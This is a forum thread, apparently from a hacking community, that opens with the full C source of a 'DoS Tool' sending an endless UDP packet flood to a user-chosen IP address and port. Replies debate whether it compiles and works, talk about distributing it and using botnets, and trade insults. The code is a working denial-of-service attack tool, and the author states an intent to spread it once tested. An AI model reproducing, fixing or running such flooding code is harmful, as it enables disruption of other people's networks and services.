Jump to content

Featured Replies

Posted

#include <stdio.h>
#include <winsock.h>

int main() 
{
   printf("*************************\n");
   printf("* DoS Tool by Darkurza  *\n");
   printf("* UDP Packet Flood      *\n");
   printf("*************************\n");
   WSADATA wsaData;
   SOCKET SendSocket;
   sockaddr_in RecvAddr;
   int PORT;     //must be declared
   char IP[256]; // must be declared
   char SendBuf[50000];
   int BufLen = 50000;
   int redo = 0;
   
   printf("IP:");
   scanf("%s", &IP);
   printf("PORT:");
   scanf("%d", &PORT);
   
   WSAStartup(MAKEWORD(2,2), &wsaData);
   SendSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
   
   RecvAddr.sin_family = AF_INET;
   RecvAddr.sin_port = htons(PORT);
   RecvAddr.sin_addr.s_addr = inet_addr(IP);
   
   do 
   {
       printf("Sending a datagram to the receiver...\n");
       sendto(SendSocket, 
              SendBuf, 
              BufLen, 
              0, 
              (SOCKADDR *) &RecvAddr, 
              sizeof(RecvAddr));
    }
    while ( redo == 0);    

 
    printf("Finished sending. Closing socket.\n");
    closesocket(SendSocket);

 
    printf("Exiting.\n");
    WSACleanup();
    return 0;
}

 

would this send thousands of packets to [iP] thru [PORT]?

  • Author
  greeneyes said:
i know this is a really nit picky thing to say but you spelt studio wrong in the first line

 

no...stdio or standard input output or cstdio

 

not studio

  greeneyes said:
i know this is a really nit picky thing to say but you spelt studio wrong in the first line

 

haha

  Quote
char SendBuf[50000;

 

No, it wouldn't work as it wouldn't compile.

Why ask if it would work when you can test it and find out for yourself?

  • Author
  Paine said:
No, it wouldn't work as it wouldn't compile.

Why ask if it would work when you can test it and find out for yourself?

 

it can compile...the only thing i dont know is if the packets will actually reach their destination...so far im only able to track how much packets i send out...n usually 80% of them are fragmented

dd0s yourself and see if it works.

:stupid:

 

char SendBuf[50000;

Can't compile.

 

It would probably send the packets, but I don't think fast enough for DoS. :O_o:

The stupidity of dark_urza prevails.

 

Are you expecting to UDP flood someone from one computer?

Well, at least he knows some C++, unlike many people on this forum that come here to spam and haven't got the first clue about even scripting.

Expected primary-expression before "char"

`SendBuf' undeclared (first use this function)

  • Author
  lsd4kids said:
The stupidity of dark_urza prevails.

 

Are you expecting to UDP flood someone from one computer?

 

are u dumb?? if your gonna write a program to ****, would u gather computers first then distrubute programs? or are u gonna write one, try it urself, if it works then u distribute it...

 

n i tried Dos'ing myself...i log like 3000 packets a second going out but only 25% of those are coming in...i think my router blocks the broken ones n cause me to flood myself sometimes

  lsd4kids said:
The stupidity of dark_urza prevails.

 

Are you expecting to UDP flood someone from one computer?

 

whats wrong with that? you can if your connection > theirs

 

hah remembers divine intervention ]|[ that program kicked ass in the day

  lsd4kids said:
The stupidity of dark_urza prevails.

 

Are you expecting to UDP flood someone from one computer?

 

your an idiot, you cant **** someone without getting the initial flooding program working properly.

 

anyway, urza is m3n

No. You're a dipshit, and anyone that sides with you is also a dipshit.

 

IvanDrago, yeah, you cant flood someone without a flooding 'program'. No shit aye? With as sharp an intelect as yours, shouldn't you be working for NASA? "Dark_Urza is m3n"? Im sure you support dark_urza in the move for microsoft to convert visual studio from an IDE to a programing language.

 

  \ said:

n i tried Dos'ing myself...i log like 3000 packets a second going out but only 25% of those are coming in...i think my router blocks the broken ones n cause me to flood myself sometimes

 

People that weild botnets are pratts. No personal contacts or amount of knowledge change this.

 

This topic is pointless, either you created the program, in which case you already know the answer to you're question, or the src was ripped from an existing trojan.

 

Lastly, to "greeneyes", i would not recommend packet flooding people from your home connection. Not only would it be immensly easy to find you, typical residential internet access will never be enough to take down anything commercial, or in ADSL/dialup's cases, anything at all.

 

(call it a blind hunch, but somehow i doubt dark_urza has a fiber-optic connection)

Did you guys all just get pwned or is he really really raged?

 

I can't quite tell, someone tell me.

  lsd4kids said:
vanDrago, yeah, you cant flood someone without a flooding 'program'. No shit aye? With as sharp an intelect as yours, shouldn't you be working for NASA? "Dark_Urza is m3n"? Im sure you support dark_urza in the move for microsoft to convert visual studio from an IDE to a programing language.

 

me --> :bj: <-- you

  • Author
  lsd4kids said:
No. You're a dipshit, and anyone that sides with you is also a dipshit.

 

IvanDrago, yeah, you cant flood someone without a flooding 'program'. No shit aye? With as sharp an intelect as yours, shouldn't you be working for NASA? "Dark_Urza is m3n"? Im sure you support dark_urza in the move for microsoft to convert visual studio from an IDE to a programing language.

 

 

 

People that weild botnets are pratts. No personal contacts or amount of knowledge change this.

 

This topic is pointless, either you created the program, in which case you already know the answer to you're question, or the src was ripped from an existing trojan.

 

Lastly, to "greeneyes", i would not recommend packet flooding people from your home connection. Not only would it be immensly easy to find you, typical residential internet access will never be enough to take down anything commercial, or in ADSL/dialup's cases, anything at all.

 

(call it a blind hunch, but somehow i doubt dark_urza has a fiber-optic connection)

 

 

 

1) I have fiber-optic connection, its not really good but its been at its best performance ever.

 

2) I didnt rip it from a trojan...theres no difference in flooding someone from one trojan to another unless they are written in different languages

 

3) I am pretty sure greeneyes is smart enough not to flood someone from his own house.

 

 

i have posted shit in the past...but i dont post that much any more.. however,(correct me if im wrong) i have not seen anything posted by you which is even worthy of looking at...all you do is flame flame flame but when the g0ts get here...you are all silent and hoping that they wont say anything against you.

does calling me a dipshit make you feel better? or are you just raged? do you know anything other then "visual studio isnt a language"?

  dark_urza said:
3) I am pretty sure greeneyes is smart enough not to flood someone from his own house.

 

cheers man, I was saying it was possible (if theyre on like 56k,128k), not recomended

  dark_urza said:
1) I have fiber-optic connection, its not really good but its been at its best performance ever.

 

Excuse my ignorance, but what is that suppose to mean? Irrelevant really, but what is your carrier speed?

 

  dark_urza said:
i have posted shit in the past...but i dont post that much any more.. however,(correct me if im wrong) i have not seen anything posted by you which is even worthy of looking at...all you do is flame flame flame but when the g0ts get here...you are all silent and hoping that they wont say anything against you.

does calling me a dipshit make you feel better? or are you just raged? do you know anything other then "visual studio isnt a language"?

 

After adding the emphasis you intended to use in your post, i agree, you havent posted anything other than shit. You've only posted code with a request for help. Now, when im stuck and need others to look at my code, i usualy post in a forum pertaining to the project.

 

I dont understand what you're saying about "when the g0ts get here", im sure they all posses the ability to view and reply to this thread, the same as any other user...

 

To answer your question about me shit-talking you - yes, it does make me feel better. That, or its a laugh (either way.)

 

  \ said:
cheers man, I was saying it was possible (if theyre on like 56k,128k), not recomended

 

I never said it wasnt...

 

Elavate, yeah im a little raged, but their not the cause :rolleyes:

Guy's lsd4kids > you k. Don't backtalk him when we are talking code here. If he gives you advice i'd suggest take it or just shut up. Because about 80% of the time he's right.

 

That and he is bright, not a dim-witted retard like the rest of you. (Not all of you are retards.)

Guest
This topic is now closed to further replies.